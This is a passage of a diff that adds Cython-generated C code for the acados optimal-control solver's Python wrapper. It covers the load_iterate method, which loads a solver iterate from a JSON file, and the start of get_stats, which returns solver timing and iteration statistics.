/*try:*/ { + __pyx_v_f = __pyx_t_3; + __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":339 + * + * with open(filename, 'r') as f: + * solution = json.load(f) # <<<<<<<<<<<<<< + * + * for key in solution.keys(): + */ + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_v_json, __pyx_n_s_load); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 339, __pyx_L8_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_1 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_v_f}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 339, __pyx_L8_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __pyx_v_solution = __pyx_t_3; + __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":338 + * raise Exception('load_iterate: failed, file does not exist: ' + os.path.join(os.getcwd(), filename)) + * + * with open(filename, 'r') as f: # <<<<<<<<<<<<<< + * solution = json.load(f) + * + */ + } + __Pyx_XDECREF(__pyx_t_10); __pyx_t_10 = 0; + __Pyx_XDECREF(__pyx_t_11); __pyx_t_11 = 0; + __Pyx_XDECREF(__pyx_t_12); __pyx_t_12 = 0; + goto __pyx_L13_try_end; + __pyx_L8_error:; + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; + /*except:*/ { + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.load_iterate", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_3, &__pyx_t_2, &__pyx_t_1) < 0) __PYX_ERR(0, 338, __pyx_L10_except_error) + __Pyx_XGOTREF(__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_1); + __pyx_t_8 = PyTuple_Pack(3, __pyx_t_3, __pyx_t_2, __pyx_t_1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 338, __pyx_L10_except_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_13 = __Pyx_PyObject_Call(__pyx_t_9, __pyx_t_8, NULL); + __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + if (unlikely(!__pyx_t_13)) __PYX_ERR(0, 338, __pyx_L10_except_error) + __Pyx_GOTREF(__pyx_t_13); + __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_t_13); + __Pyx_DECREF(__pyx_t_13); __pyx_t_13 = 0; + if (__pyx_t_6 < 0) __PYX_ERR(0, 338, __pyx_L10_except_error) + __pyx_t_5 = (!__pyx_t_6); + if (unlikely(__pyx_t_5)) { + __Pyx_GIVEREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_ErrRestoreWithState(__pyx_t_3, __pyx_t_2, __pyx_t_1); + __pyx_t_3 = 0; __pyx_t_2 = 0; __pyx_t_1 = 0; + __PYX_ERR(0, 338, __pyx_L10_except_error) + } + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + goto __pyx_L9_exception_handled; + } + __pyx_L10_except_error:; + __Pyx_XGIVEREF(__pyx_t_10); + __Pyx_XGIVEREF(__pyx_t_11); + __Pyx_XGIVEREF(__pyx_t_12); + __Pyx_ExceptionReset(__pyx_t_10, __pyx_t_11, __pyx_t_12); + goto __pyx_L1_error; + __pyx_L9_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_10); + __Pyx_XGIVEREF(__pyx_t_11); + __Pyx_XGIVEREF(__pyx_t_12); + __Pyx_ExceptionReset(__pyx_t_10, __pyx_t_11, __pyx_t_12); + __pyx_L13_try_end:; + } + } + /*finally:*/ { + /*normal exit:*/{ + if (__pyx_t_9) { + __pyx_t_12 = __Pyx_PyObject_Call(__pyx_t_9, __pyx_tuple__17, NULL); + __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; + if (unlikely(!__pyx_t_12)) __PYX_ERR(0, 338, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_12); + __Pyx_DECREF(__pyx_t_12); __pyx_t_12 = 0; + } + goto __pyx_L7; + } + __pyx_L7:; + } + goto __pyx_L17; + __pyx_L4_error:; + __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; + goto __pyx_L1_error; + __pyx_L17:; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":341 + * solution = json.load(f) + * + * for key in solution.keys(): # <<<<<<<<<<<<<< + * (field, stage) = key.split('_') + * self.set(int(stage), field, np.array(solution[key])) + */ + __pyx_t_14 = 0; + if (unlikely(!__pyx_v_solution)) { __Pyx_RaiseUnboundLocalError("solution"); __PYX_ERR(0, 341, __pyx_L1_error) } + if (unlikely(__pyx_v_solution == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "keys"); + __PYX_ERR(0, 341, __pyx_L1_error) + } + __pyx_t_2 = __Pyx_dict_iterator(__pyx_v_solution, 0, __pyx_n_s_keys, (&__pyx_t_15), (&__pyx_t_4)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 341, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_1); + __pyx_t_1 = __pyx_t_2; + __pyx_t_2 = 0; + while (1) { + __pyx_t_16 = __Pyx_dict_iter_next(__pyx_t_1, __pyx_t_15, &__pyx_t_14, &__pyx_t_2, NULL, NULL, __pyx_t_4); + if (unlikely(__pyx_t_16 == 0)) break; + if (unlikely(__pyx_t_16 == -1)) __PYX_ERR(0, 341, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_XDECREF_SET(__pyx_v_key, __pyx_t_2); + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":342 + * + * for key in solution.keys(): + * (field, stage) = key.split('_') # <<<<<<<<<<<<<< + * self.set(int(stage), field, np.array(solution[key])) + * + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_v_key, __pyx_n_s_split); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 342, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_8 = NULL; + __pyx_t_16 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_8 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_8)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_8); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_16 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_8, __pyx_n_u__15}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_16, 1+__pyx_t_16); + __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 342, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + if ((likely(PyTuple_CheckExact(__pyx_t_2))) || (PyList_CheckExact(__pyx_t_2))) { + PyObject* sequence = __pyx_t_2; + Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); + if (unlikely(size != 2)) { + if (size > 2) __Pyx_RaiseTooManyValuesError(2); + else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); + __PYX_ERR(0, 342, __pyx_L1_error) + } + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + if (likely(PyTuple_CheckExact(sequence))) { + __pyx_t_3 = PyTuple_GET_ITEM(sequence, 0); + __pyx_t_8 = PyTuple_GET_ITEM(sequence, 1); + } else { + __pyx_t_3 = PyList_GET_ITEM(sequence, 0); + __pyx_t_8 = PyList_GET_ITEM(sequence, 1); + } + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(__pyx_t_8); + #else + __pyx_t_3 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 342, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_8 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 342, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + #endif + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } else { + Py_ssize_t index = -1; + __pyx_t_7 = PyObject_GetIter(__pyx_t_2); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 342, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_17 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_7); + index = 0; __pyx_t_3 = __pyx_t_17(__pyx_t_7); if (unlikely(!__pyx_t_3)) goto __pyx_L20_unpacking_failed; + __Pyx_GOTREF(__pyx_t_3); + index = 1; __pyx_t_8 = __pyx_t_17(__pyx_t_7); if (unlikely(!__pyx_t_8)) goto __pyx_L20_unpacking_failed; + __Pyx_GOTREF(__pyx_t_8); + if (__Pyx_IternextUnpackEndCheck(__pyx_t_17(__pyx_t_7), 2) < 0) __PYX_ERR(0, 342, __pyx_L1_error) + __pyx_t_17 = NULL; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + goto __pyx_L21_unpacking_done; + __pyx_L20_unpacking_failed:; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __pyx_t_17 = NULL; + if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); + __PYX_ERR(0, 342, __pyx_L1_error) + __pyx_L21_unpacking_done:; + } + __Pyx_XDECREF_SET(__pyx_v_field, __pyx_t_3); + __pyx_t_3 = 0; + __Pyx_XDECREF_SET(__pyx_v_stage, __pyx_t_8); + __pyx_t_8 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":343 + * for key in solution.keys(): + * (field, stage) = key.split('_') + * self.set(int(stage), field, np.array(solution[key])) # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_set); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 343, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __pyx_t_3 = __Pyx_PyNumber_Int(__pyx_v_stage); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 343, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GetModuleGlobalName(__pyx_t_18, __pyx_n_s_np); if (unlikely(!__pyx_t_18)) __PYX_ERR(0, 343, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_18); + __pyx_t_19 = __Pyx_PyObject_GetAttrStr(__pyx_t_18, __pyx_n_s_array); if (unlikely(!__pyx_t_19)) __PYX_ERR(0, 343, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_19); + __Pyx_DECREF(__pyx_t_18); __pyx_t_18 = 0; + if (unlikely(!__pyx_v_solution)) { __Pyx_RaiseUnboundLocalError("solution"); __PYX_ERR(0, 343, __pyx_L1_error) } + __pyx_t_18 = __Pyx_PyObject_GetItem(__pyx_v_solution, __pyx_v_key); if (unlikely(!__pyx_t_18)) __PYX_ERR(0, 343, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_18); + __pyx_t_20 = NULL; + __pyx_t_16 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_19))) { + __pyx_t_20 = PyMethod_GET_SELF(__pyx_t_19); + if (likely(__pyx_t_20)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_19); + __Pyx_INCREF(__pyx_t_20); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_19, function); + __pyx_t_16 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_20, __pyx_t_18}; + __pyx_t_7 = __Pyx_PyObject_FastCall(__pyx_t_19, __pyx_callargs+1-__pyx_t_16, 1+__pyx_t_16); + __Pyx_XDECREF(__pyx_t_20); __pyx_t_20 = 0; + __Pyx_DECREF(__pyx_t_18); __pyx_t_18 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 343, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_19); __pyx_t_19 = 0; + } + __pyx_t_19 = NULL; + __pyx_t_16 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_8))) { + __pyx_t_19 = PyMethod_GET_SELF(__pyx_t_8); + if (likely(__pyx_t_19)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_8); + __Pyx_INCREF(__pyx_t_19); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_8, function); + __pyx_t_16 = 1; + } + } + { + PyObject *__pyx_callargs[4] = {__pyx_t_19, __pyx_t_3, __pyx_v_field, __pyx_t_7}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_8, __pyx_callargs+1-__pyx_t_16, 3+__pyx_t_16); + __Pyx_XDECREF(__pyx_t_19); __pyx_t_19 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 343, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":330 + * + * + * def load_iterate(self, filename): # <<<<<<<<<<<<<< + * """ + * Loads the iterate stored in json file with filename into the ocp solver. + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_XDECREF(__pyx_t_18); + __Pyx_XDECREF(__pyx_t_19); + __Pyx_XDECREF(__pyx_t_20); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.load_iterate", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_json); + __Pyx_XDECREF(__pyx_v_f); + __Pyx_XDECREF(__pyx_v_solution); + __Pyx_XDECREF(__pyx_v_key); + __Pyx_XDECREF(__pyx_v_field); + __Pyx_XDECREF(__pyx_v_stage); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":346 + * + * + * def get_stats(self, field_): # <<<<<<<<<<<<<< + * """ + * Get the information of the last solver call. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_23get_stats(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_22get_stats, "\n Get the information of the last solver call.\n\n :param field: string in ['statistics', 'time_tot', 'time_lin', 'time_sim', 'time_sim_ad', 'time_sim_la', 'time_qp', 'time_qp_solver_call', 'time_reg', 'sqp_iter']\n Available fileds:\n - time_tot: total CPU time previous call\n - time_lin: CPU time for linearization\n - time_sim: CPU time for integrator\n - time_sim_ad: CPU time for integrator contribution of external function calls\n - time_sim_la: CPU time for integrator contribution of linear algebra\n - time_qp: CPU time qp solution\n - time_qp_solver_call: CPU time inside qp solver (without converting the QP)\n - time_qp_xcond: time_glob: CPU time globalization\n - time_solution_sensitivities: CPU time for previous call to eval_param_sens\n - time_reg: CPU time regularization\n - sqp_iter: number of SQP iterations\n - qp_iter: vector of QP iterations for last SQP call\n - statistics: table with info about last iteration\n - stat_m: number of rows in statistics matrix\n - stat_n: number of columns in statistics matrix\n - residuals: residuals of last iterate\n - alpha: step sizes of SQP iterations\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_23get_stats = {"get_stats", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_23get_stats, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_22get_stats}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_23get_stats(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_field_ = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("get_stats (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_field_2,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field_2)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 346, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "get_stats") < 0)) __PYX_ERR(0, 346, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_field_ = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("get_stats", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 346, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.get_stats", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_22get_stats(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_field_); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_22get_stats(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field_) { + PyObject *__pyx_v_double_fields = NULL; + CYTHON_UNUSED PyObject *__pyx_v_fields = NULL; + PyObject *__pyx_v_field = NULL; + PyObject *__pyx_v_sqp_iter = NULL; + PyObject *__pyx_v_stat_m = NULL; + PyObject *__pyx_v_stat_n = NULL; + PyObject *__pyx_v_min_size = NULL; + PyObject *__pyx_v_full_stats = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_t_5; + int __pyx_t_6; + PyObject *__pyx_t_7 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_stats", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":371 + * """ + * + * double_fields = ['time_tot', # <<<<<<<<<<<<<< + * 'time_lin', + * 'time_sim', + */ + __pyx_t_1 = PyList_New(11); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 371, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_time_tot); + __Pyx_GIVEREF(__pyx_n_u_time_tot); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_time_tot); + __Pyx_INCREF(__pyx_n_u_time_lin); + __Pyx_GIVEREF(__pyx_n_u_time_lin); + PyList_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_time_lin); + __Pyx_INCREF(__pyx_n_u_time_sim); + __Pyx_GIVEREF(__pyx_n_u_time_sim); + PyList_SET_ITEM(__pyx_t_1, 2, __pyx_n_u_time_sim); + __Pyx_INCREF(__pyx_n_u_time_sim_ad); + __Pyx_GIVEREF(__pyx_n_u_time_sim_ad); + PyList_SET_ITEM(__pyx_t_1, 3, __pyx_n_u_time_sim_ad); + __Pyx_INCREF(__pyx_n_u_time_sim_la); + __Pyx_GIVEREF(__pyx_n_u_time_sim_la); + PyList_SET_ITEM(__pyx_t_1, 4, __pyx_n_u_time_sim_la); + __Pyx_INCREF(__pyx_n_u_time_qp); + __Pyx_GIVEREF(__pyx_n_u_time_qp); + PyList_SET_ITEM(__pyx_t_1, 5, __pyx_n_u_time_qp); + __Pyx_INCREF(__pyx_n_u_time_qp_solver_call); + __Pyx_GIVEREF(__pyx_n_u_time_qp_solver_call); + PyList_SET_ITEM(__pyx_t_1, 6, __pyx_n_u_time_qp_solver_call); + __Pyx_INCREF(__pyx_n_u_time_qp_xcond); + __Pyx_GIVEREF(__pyx_n_u_time_qp_xcond); + PyList_SET_ITEM(__pyx_t_1, 7, __pyx_n_u_time_qp_xcond); + __Pyx_INCREF(__pyx_n_u_time_glob); + __Pyx_GIVEREF(__pyx_n_u_time_glob); + PyList_SET_ITEM(__pyx_t_1, 8, __pyx_n_u_time_glob); + __Pyx_INCREF(__pyx_n_u_time_solution_sensitivities); + __Pyx_GIVEREF(__pyx_n_u_time_solution_sensitivities); + PyList_SET_ITEM(__pyx_t_1, 9, __pyx_n_u_time_solution_sensitivities); + __Pyx_INCREF(__pyx_n_u_time_reg); + __Pyx_GIVEREF(__pyx_n_u_time_reg); + PyList_SET_ITEM(__pyx_t_1, 10, __pyx_n_u_time_reg); + __pyx_v_double_fields = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":383 + * 'time_reg' + * ] + * fields = double_fields + [ # <<<<<<<<<<<<<< + * 'sqp_iter', + * 'qp_iter', + */ + __pyx_t_1 = PyList_New(7); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 383, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_sqp_iter); + __Pyx_GIVEREF(__pyx_n_u_sqp_iter); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_sqp_iter); + __Pyx_INCREF(__pyx_n_u_qp_iter); + __Pyx_GIVEREF(__pyx_n_u_qp_iter); + PyList_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_qp_iter); + __Pyx_INCREF(__pyx_n_u_statistics); + __Pyx_GIVEREF(__pyx_n_u_statistics); + PyList_SET_ITEM(__pyx_t_1, 2, __pyx_n_u_statistics); + __Pyx_INCREF(__pyx_n_u_stat_m); + __Pyx_GIVEREF(__pyx_n_u_stat_m); + PyList_SET_ITEM(__pyx_t_1, 3, __pyx_n_u_stat_m); + __Pyx_INCREF(__pyx_n_u_stat_n); + __Pyx_GIVEREF(__pyx_n_u_stat_n); + PyList_SET_ITEM(__pyx_t_1, 4, __pyx_n_u_stat_n); + __Pyx_INCREF(__pyx_n_u_residuals); + __Pyx_GIVEREF(__pyx_n_u_residuals); + PyList_SET_ITEM(__pyx_t_1, 5, __pyx_n_u_residuals); + __Pyx_INCREF(__pyx_n_u_alpha); + __Pyx_GIVEREF(__pyx_n_u_alpha); + PyList_SET_ITEM(__pyx_t_1, 6, __pyx_n_u_alpha); + __pyx_t_2 = PyNumber_Add(__pyx_v_double_fields, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 383, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_fields = ((PyObject*)__pyx_t_2); + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":392 + * 'alpha', + * ] + * field = field_.encode('utf-8') # <<<<<<<<<<<<<< + * + * if field_ in ['sqp_iter', 'stat_m', 'stat_n']: + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_field_, __pyx_n_s_encode); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 392, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_kp_u_utf_8}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 392, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_v_field = __pyx_t_2; + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":394 + * field = field_.encode('utf-8') + * + * if field_ in ['sqp_iter', 'stat_m', 'stat_n']: # <<<<<<<<<<<<<< + * return self.__get_stat_int(field) + * + */ + __Pyx_INCREF(__pyx_v_field_); + __pyx_t_2 = __pyx_v_field_; + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_t_2, __pyx_n_u_sqp_iter, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 394, __pyx_L1_error) + if (!__pyx_t_6) { + } else { + __pyx_t_5 = __pyx_t_6; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_t_2, __pyx_n_u_stat_m, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 394, __pyx_L1_error) + if (!__pyx_t_6) { + } else { + __pyx_t_5 = __pyx_t_6; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_t_2, __pyx_n_u_stat_n, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 394, __pyx_L1_error) + __pyx_t_5 = __pyx_t_6; + __pyx_L4_bool_binop_done:; + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_6 = __pyx_t_5; + if (__pyx_t_6) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":395 + * + * if field_ in ['sqp_iter', 'stat_m', 'stat_n']: + * return self.__get_stat_int(field) # <<<<<<<<<<<<<< + * 